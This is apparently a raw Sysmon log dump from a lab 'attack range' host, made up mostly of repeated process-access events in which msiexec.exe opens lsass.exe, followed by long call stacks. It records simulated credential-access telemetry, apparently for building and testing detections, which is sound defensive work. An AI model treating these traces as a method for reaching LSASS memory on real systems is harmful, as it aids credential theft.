AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699956Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699955Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699954Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699953Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699952Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699951Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699950Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699949Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699948Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699947Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699946Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699945Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699944Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699943Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699942Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699941Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699940Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699939Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699938Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699937Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699936Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699935Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699933Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 